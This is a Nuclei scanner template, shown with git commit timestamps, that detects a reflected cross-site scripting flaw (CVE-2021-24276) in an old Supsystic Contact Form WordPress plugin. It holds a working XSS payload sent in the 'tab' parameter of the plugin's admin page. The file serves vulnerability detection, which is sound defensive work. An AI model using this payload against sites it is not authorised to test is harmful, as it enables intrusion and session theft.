nuclei-templates/cves/2021/CVE-2021-24276.yaml

38 lines
1.1 KiB
YAML
Raw Normal View History

2021-09-28 17:07:40 +00:00
id: CVE-2021-24276
info:
name: Contact Form by Supsystic < 1.7.15 - Reflected Cross-Site scripting (XSS)
author: dhiyaneshDK
severity: medium
2021-09-28 18:54:48 +00:00
description: The Contact Form by Supsystic WordPress plugin before 1.7.15 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
2021-09-28 17:07:40 +00:00
reference:
- https://wpscan.com/vulnerability/1301123c-5e63-432a-ab90-3221ca532d9c
2021-09-28 18:54:48 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-24276
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-24276
cwe-id: CWE-79
2021-09-28 18:54:48 +00:00
tags: wordpress,cve,cve2021,wp-plugin
2021-09-28 17:07:40 +00:00
requests:
- method: GET
path:
2021-09-28 18:54:48 +00:00
- '{{BaseURL}}/wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-09-28 17:07:40 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-09-28 18:54:48 +00:00
- '</script><script>alert(document.domain)</script>'
part: body
2021-09-28 17:07:40 +00:00
- type: status
status:
- 200
- type: word
words:
- "text/html"
part: header